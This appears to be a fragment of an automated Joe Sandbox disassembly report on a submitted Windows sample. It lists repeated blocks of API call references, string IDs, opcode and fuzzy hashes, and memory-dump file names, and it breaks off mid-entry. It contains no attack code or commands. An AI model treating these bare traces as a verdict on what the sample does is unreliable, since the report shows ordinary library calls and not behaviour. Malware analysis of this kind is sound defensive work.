                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 979780441-0
                                                                                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1386444988-0
                                                                                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InvalidateMessageRectSend
                                                                                                                                                              • String ID: d=E
                                                                                                                                                              • API String ID: 909852535-3703654223
                                                                                                                                                              • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                              • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                              • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                              • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                              APIs
                                                                                                                                                              • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                              • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcschr$memcpywcslen
                                                                                                                                                              • String ID: "
                                                                                                                                                              • API String ID: 1983396471-123907689
                                                                                                                                                              • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                              • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                              • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                              • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                              • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                              • String ID: URL
                                                                                                                                                              • API String ID: 2108176848-3574463123
                                                                                                                                                              • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                              • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                              • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                              • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                              APIs
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfmemcpy
                                                                                                                                                              • String ID: %2.2X
                                                                                                                                                              • API String ID: 2789212964-323797159
                                                                                                                                                              • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                              • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                              • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                              • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintf
                                                                                                                                                              • String ID: %%-%d.%ds
                                                                                                                                                              • API String ID: 3988819677-2008345750
                                                                                                                                                              • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                              • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                              • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                              • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                              • memset.MSVCRT ref: 00401917
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PlacementWindowmemset
                                                                                                                                                              • String ID: WinPos
                                                                                                                                                              • API String ID: 4036792311-2823255486
                                                                                                                                                              • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                              • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                              • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                              • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                              • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                              • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                              • String ID: _lng.ini
                                                                                                                                                              • API String ID: 383090722-1948609170
                                                                                                                                                              • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                              • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                              • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                              • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                              • API String ID: 2773794195-880857682
                                                                                                                                                              • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                              • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                              • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                                                              • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                              • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LongWindow
                                                                                                                                                              • String ID: MZ@
                                                                                                                                                              • API String ID: 1378638983-2978689999
                                                                                                                                                              • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                              • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                              • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                              • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                              APIs
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                              • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                              • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                              • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                              • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                              • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1860491036-0
                                                                                                                                                              • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                              • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                              • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                              • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                              APIs
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                              • free.MSVCRT ref: 0040A908
                                                                                                                                                              • free.MSVCRT ref: 0040A92B
                                                                                                                                                              • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                                              • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                              • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                              • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                              • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                              APIs
                                                                                                                                                              • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                              • free.MSVCRT ref: 0040B201
                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                              • free.MSVCRT ref: 0040B224
                                                                                                                                                              • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$memcpy$mallocwcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 726966127-0
                                                                                                                                                              • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                              • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                              • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                              • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                              APIs
                                                                                                                                                              • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                              • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                              • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                              • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 231171946-0
                                                                                                                                                              • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                              • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                              • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                              • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                              APIs
                                                                                                                                                              • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                              • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                              • free.MSVCRT ref: 0040B12C
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
